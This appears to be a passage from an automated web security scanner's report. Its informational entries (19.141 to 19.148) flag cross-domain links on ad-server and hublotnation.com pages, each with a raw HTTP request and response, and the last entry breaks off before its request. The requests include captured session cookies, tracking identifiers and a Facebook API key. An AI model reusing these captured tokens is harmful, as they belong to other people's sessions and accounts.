<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.trip.com/%253Ftype%253Dair%2526utm_source%253Dorbitz%2526utm_medium%253Dcrpopunder%2526utm_content%253Dair%2526utm_campaign%253Dtriplooking%2526cmpid%253D1%26hl%3Den%26client%3Dca-pub-8213526369189339%26adU%3Dwww.Travelzoo.com%26adT%3DFlights%2Bfrom%2B%252439%26adU%3DLasVegas.TripMama.com/Flights%26adT%3DLas%2BVegas%2BFlight%2BFrom%2B%252439%26adU%3DLowFares.com/Paris-Flights%26adT%3DParis%2BFlights%2Bfrom%2B%252449*%26adU%3Dwww.CheapCaribbean.com%26adT%3DCheap%2BCaribbean%26gl%3DUS&amp;usg=AFQjCNEa9JgUy79CsbPhprwspCJxrMi1Qw" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.141. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-8213526369189339&output=html&h=280&slotname=9968660253&w=336&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.trip.com%2Fhotels.html&dt=1317602228730&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317602228802&frm=7&adk=3345861870&ga_vid=2049523975.1317602099&ga_sid=1317602099&ga_hid=270757924&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=669&ady=257&biw=1058&bih=906&ifk=3906417519&prodhost=googleads.g.doubleclick.net&fu=4&ifi=1&dtd=75 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 00:37:41 GMT
Server: cafe
Cache-Control: private
Content-Length: 13423
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.trip.com/hotels.html%26hl%3Den%26client%3Dca-pub-8213526369189339%26adU%3Dwww.Hotelsio.com/%26adT%3D75%2525%2BOff%2BHotels%26adU%3Dwww.CheapOstay.com%26adT%3DHotel%2BDiscount%2B-%2B50%2525%2BOFF%26adU%3Dwww.TripIt.com%26adT%3DCheck%2Bmy%2Btrip%26adU%3Dwww.Zozi.com/Golf%26adT%3D90%2525%2BOff%2BGolf%2BNear%2BSJ%26gl%3DUS&amp;usg=AFQjCNEBf4rqme7FMC42Cy4eg5QFRFEq1A" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.142. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-8213526369189339&output=html&h=250&slotname=2997671440&w=300&lmt=1316754276&num_ads=6&channel=5284625514&flash=10.3.183&hints=hotels&url=http%3A%2F%2Fwww.trip.com%2Fhotels.html&dt=1317602151658&shv=r20100101&jsv=r20100101&correlator=1317602151660&frm=0&adk=3467918738&ga_vid=2049523975.1317602099&ga_sid=1317602099&ga_hid=57948256&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&biw=1058&bih=906&ref=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&fu=0&js=uds&eid=37464000 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 00:36:58 GMT
Server: cafe
Cache-Control: private
Content-Length: 9539
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.trip.com/hotels.html%26hl%3Den%26client%3Dca-pub-8213526369189339%26adU%3DVacationCruisesInfo.com/Honeymoon%26adT%3DHoneymoon%2BCruises%26gl%3DUS&amp;usg=AFQjCNE2HDhucXZUk6KE7_1_v2YKdwYEmA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.143. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-8213526369189339&output=html&h=250&slotname=2997671440&w=300&lmt=1316754276&num_ads=6&channel=5284625514&flash=10.3.183&hints=flights&url=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&dt=1317602103969&shv=r20100101&jsv=r20100101&correlator=1317602103971&frm=0&adk=3467918738&ga_vid=2049523975.1317602099&ga_sid=1317602099&ga_hid=1430756546&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&biw=0&bih=0&fu=0&js=uds&eid=37464000 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 00:35:10 GMT
Server: cafe
Cache-Control: private
Content-Length: 13890
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.trip.com/%253Ftype%253Dair%2526utm_source%253Dorbitz%2526utm_medium%253Dcrpopunder%2526utm_content%253Dair%2526utm_campaign%253Dtriplooking%2526cmpid%253D1%26hl%3Den%26client%3Dca-pub-8213526369189339%26adU%3DLima.OneTime.com%26adT%3DLima%2BFlights%26adU%3Dwww.BookingWiz.com/LasVegas-Flights%26adT%3DCheap%2BFlights%2Bfrom%2B%252449*%26adU%3DCheapOair.com%26adT%3DCheapOair%25C2%25AE%2BCheap%2BFlights%26adU%3Dwww.AlphaFlightGuru.com%26adT%3D70%2525%2BOff%2BBusiness%2BClass%26gl%3DUS&amp;usg=AFQjCNFs72kJvazLNSqyqgJnDdTq5eDFtQ" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.144. http://hublotnation.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hublotnation.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?xd_receiver=1 HTTP/1.1
Host: hublotnation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.facebook.com/extern/login_status.php?api_key=50c378d8154db3a16aee8f1a8bb76f49&extern=0&channel=http%3A%2F%2Fhublotnation.com%2F%3Fxd_receiver%3D1&locale=en_US&sdk=edgar
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=24bfa029727b378b6c72d277baca45b9; __utma=126786964.1720787815.1317600056.1317600056.1317600056.1; __utmb=126786964.2.10.1317600056; __utmc=126786964; __utmz=126786964.1317600056.1.1.utmcsr=hublot.com|utmccn=(referral)|utmcmd=referral|utmcct=/site/loader.swf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:04:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Expires: Mon, 26 Sep 2011 00:04:49 GMT
Last-Modified: Mon, 03 Oct 2011 00:04:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Content-Length: 318
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xd</title></head>
<body>
<script src="http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js" type="text/javascript"></script>
...[SNIP]...
19.145. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ab?enc=q5uLv-0J1z9oWii6qmPUPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAEAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAniXlYwAAAAA.&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1&pp=AAABMscLuNXWwtw0Z865RCwSLWzLJFnAyLYkYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:52:19 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:52:19 GMT
Content-Length: 1783

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj
...[SNIP]...
</iframe>');document.write('<iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
19.146. http://ib.adnxs.com/if  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAHifUFwAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:52:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Sun, 02 Oct 2011 23:52:21 GMT
Content-Length: 3209

<IFRAME SRC="http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEDAQUCAQQAAAAAHyfnFwAAAAA./cnd=!sAQDJgiylwcQsrMkGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0

HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6010.456584.XAXIS.COM/B5752701.15;abr=!ie;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEDAQUCAQQAAAAAHyfnFwAAAAA./cnd=!sAQDJgiylwcQsrMkGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426?">
</SCRIPT>
...[SNIP]...
DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426?">
<IMG SRC="http://ad.doubleclick.net/ad/N6010.456584.XAXIS.COM/B5752701.15;abr=!ie4;abr=!ie5;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEDAQUCAQQAAAAAHyfnFwAAAAA./cnd=!sAQDJgiylwcQsrMkGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426?" BORDER=0 WIDTH=728 HEIGHT=90

ALT="Advertisement"></A>
...[SNIP]...
19.147. http://ib.adnxs.com/if  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /if?enc=VA8_znuE3j81XrpJDALbPwAAAMDMzPQ_idS0i2nG4T9os-pztRXkP1FauSSUjOIucEeI8W8QIlnW-ohOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEKA8BAgUCAQQAAAAA9CQ0EAAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ1CQQwFwPe5tNJvg9SS97K9AS3Qw54xZdAVXUAvRIjJZ8cG4Npzjb2oEHtTSs0LWddJNc4UuK9qJg6H-_P73nH8j5bbHDEE4pEWLROmlWch7wurhaJDssMJ0JvDGdunOlyAxws_JgE413MAAAA%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+27755%2C+1317599958%29%3Buf%28%27c%27%2C+149177%2C+1317599958%29%3Buf%28%27r%27%2C+652926%2C+1317599958%29%3Bppv%2817492%2C+%273378417238380468817%27%2C+1317599958%2C+1317859158%2C+149177%2C+25661%2C+0%29%3Bppv%2817492%2C+%273378417238380468817%27%2C+1317599958%2C+1317859158%2C+149177%2C+25661%2C+0%29%3B&cnd=!Dh5vzwi5jQkQ_uwnGAAgvcgBMAE4_ANAAEiCCFAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAqgBA7ABALkBkJ0uALYV5D_BAZCdLgC2FeQ_yQFmZmZmZmbyP9kBAAAAAAAA8D_gAQA.&ccd=!NwWFKgi5jQkQ_uwnGL3IASAA&referrer=http://www.goal.com&media_subtypes=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:59:23 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Sun, 02 Oct 2011 23:59:23 GMT
Content-Length: 627

<script language="javascript" src="http://www.inadcoads.com/script.ashx?pczid=269ccbc6-3ea2-4863-8eb1-67f59498f8ce&click_url=http://ib.adnxs.com/click?VA8_znuE3j81XrpJDALbPwAAAMDMzPQ_idS0i2nG4T9os-pztRXkP1FauSSUjOIucEeI8W8QIlnW-ohOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEKA8DAQUCAQQAAAAA9SRHEAAAAAA./cnd=!NwWFKgi5jQkQ_uwnGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ1CQQwFwPe5tNJvg9SS97K9AS3Qw54xZdAVXUAvRIjJZ8cG4Npzjb2oEHtTSs0LWddJNc4UuK9qJg6H-_P73nH8j5bbHDEE4pEWLROmlWch7wurhaJDssMJ0JvDGdunOlyAxws_JgE413MAAAA%3D%26dst%3D">
</script>
19.148. http://ib.adnxs.com/if  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

